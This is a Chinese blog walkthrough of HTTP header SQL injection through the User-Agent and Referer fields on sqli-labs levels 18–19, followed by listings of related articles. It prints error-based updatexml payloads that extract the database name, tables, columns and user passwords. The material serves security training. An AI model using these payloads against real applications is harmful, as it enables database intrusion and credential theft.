16、HTTP头注入(User-Agent、Referer)

最新推荐文章于 2024-05-20 08:37:18 发布
最新推荐文章于 2024-05-20 08:37:18 发布
阅读量2k 收藏 3
点赞数
分类专栏: 小课堂 文章标签: HTTP头 头注入 User-Agent Referer
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/103402146
版权

环境sqli-labs

less 18

1、在UA处输入特殊字符,报错
在这里插入图片描述
在这里插入图片描述
2、构造输入语句,获取数据库名称
or updatexml(1,concat(’##’,(database())),0))#
在这里插入图片描述
在这里插入图片描述
3、获取表名
or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)),0))#
在这里插入图片描述
在这里插入图片描述
4、获取字段
or updatexml(1,concat(’#’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0))#
在这里插入图片描述
在这里插入图片描述
5、获取字段内容
or updatexml(1,concat(’#’,(select * from (select concat_ws(’#’,id,username,password) from users limit 0,1) a)),0))#
在这里插入图片描述
在这里插入图片描述

less 19

输入点在referer,注入语句同less 18

禁止非法,后果自负

欢迎关注公众号:web安全工具库
在这里插入图片描述

web安全工具库
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
24-4 SQL 注入 - http注入referer注入
weixin_43263566的博客
02-28 388
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
sqli-labs Less-19(HTTP-Referer注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 277
通过在Referer后面加上单引号和双引号测试,猜测SQL语句大致为 insert into xxx(a,b,c) values('','','') 发现这样的payload可以时sql语句正常执行 经过尝试,发现可以使用报错注入,利用extractvalue()函数 成功爆出数据库版本号。 ...
【SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 4714
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
网站漏洞扫描工具AWVS_v13下载和安装_awvs下载
最新发布
qq_53058639的博客
05-20 1048
Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它能够测试你的网站安全,检测网站的安全漏洞,如sql 注入,交叉站点脚本等等。
sql注入之cookie 注入user-agent注入
没有故事
02-27 436
BP 抓包,在user- agent 注入,页面没有正确错误回显。页面没有正确错误显示,BP抓包,在抓包内容里面看到输入内容在cookie 里面。注入:cookie:user =1' order by 3#sqlmap :保存文件,参数位置加*或者指定参数-p。抓包后,cookie: user=admin。cookie 身份验证信息。在cookie里面进行注入
Sqlmap2021 -- Referer注入
weixin_41489908的博客
07-07 1971
一直向前走,天总会亮的。。。 ---- 网易云热评 一、检测是否存在注入 1、通过BurpSuite抓包,将封包内容保存到referer.txt POST /sqli/Less-19/ HTTP/1.1 Host: 192.168.139.129 Content-Length: 38 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.139.129 Content-Type: a..
第十一节 HTTP中的SQL注入-01
09-15
HTTP包含了诸如User-AgentReferer等信息,这些信息通常用于跟踪用户浏览器类型、来源页面等。然而,如果开发者没有正确地处理这些信息,攻击者可以构造特殊的HTTP来执行恶意的SQL语句。例如,User-Agent和...
第九节 Sqlmap注入位置介绍-01
09-15
* --skip 选项:忽略探测具体的参数,例如:--level --skip “user-agent,referer” * --param-exclude 选项:忽略包含具体内容的参数,例如:--param-exclude="token|session" * --skip-static 选项:忽略非动态...
SQL注入思路详解
12-14
这些点包括GET和POST请求参数、Cookie值、HTTP如X-Forwarded-For、User-AgentReferer等。攻击者会尝试在这些位置插入恶意代码,看是否能影响到数据库操作。 2. **SQL注入语句测试**:在测试阶段,攻击者会使用...
第四节 Sqlmap 请求参数设置2-01
09-15
在本节中,我们将详细介绍 Sqlmap 的请求参数设置,包括 User-Agent、Host Referer 和额外 HTTP 的设置。 Sqlmap 设置 User-Agent 默认情况下,Sqlmap 使用以下用户代理值执行 HTTP 请求:`sqlmap/1.0-...
Less19 (referer注入)
老司机开代码的博客
08-03 1670
文章目录1. 什么是referer?2. 分析题目3. 手工注入4. SQLmap注入 1. 什么是referer? 简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。 之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。 HTTP请求中的referer字段 2. 分析题目 这关的思路和Less-8几乎是一样的。首先看一下网站源码: $sql="SELECT users.username, user
CTFHub - Refer注入
Have_a_great_day的博客
09-12 640
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
CTFHub | Refer注入
尼泊罗河伯的博客
11-26 1776
根据题目显示内容,此题和上一题一致,需要在 Refer 请求中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer请求中使用 payload 进行测试,发现此题存在 Refer注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1267
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
渗透测试---手把手教你SQL注入(3)---UA注入referer注入
weixin_52796034的博客
10-10 489
有些网站会把用户的UA信息写入数据库,用来收集和统计用户信息,此时就有可能存在UA 注入,一般会把数据插入到某张表中所以可以用报错注入。 当我们访问一个网站的时候,我们的浏览器需要告诉服务器我们是从哪个地方访问服务器的,大部分网站或者app都会将这样的信息写入数据库用来分析流量从哪里来,以及统计广告投入的成本,通常情况下,服务器会把数据插入到某张表中,那么我们就可以借此使用报错注入
SQLilabs的第19关——http请求注入(Referer)(报错注入
qq_73393033的博客
07-22 378
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
易想团购 注入 user.php,PHPCMS 2008 c.php存在referer sql注入及修复方案
weixin_34729012的博客
04-10 266
require './ads/include/common.inc.php';require 'f.php'; //此处为我加入的 防止 referer 攻击的代码,再下面 会介绍 f.php$id = intval($id);$ads = $c_ads->get_info($id);if($ads){$db->query("UPDATE ".DB_PRE."ads SET `cl...
UA注入Cookie注入Referer注入
十五年游戏主程转渗透之路
04-09 5081
UA注入,Cookie注入Referer注入
渗透测试之SQL注入(读写文件、dnslog盲注、宽字节注入User-Agent注入Referer注入、Cookie注入、二次注入
Hi~ 土拨鼠
12-11 1184
文章目录读取文件操作写入文件操作宽字节注入Cookie注入 mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以利用SQL注入漏洞对文件进行读写(但前提是权限足够)。 前提条件: 当前用户具有文件权限,尽量具有root权限 查询是否有文件权限:select File_priv from mysql.user where user = 'root' and host = 'localhost'; secure_file_priv不为NULL secure_file_p
HTTP中的SQL注入风险:User-AgentReferer漏洞详解
本章节深入探讨了HTTP中的SQL注入问题,强调了在现代网络安全意识增强的背景下,尽管大部分网站在用户提交参数时采取了过滤措施来防止SQL注入,但HTTP部如User-AgentReferer和Cookies等区域往往容易被忽视,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值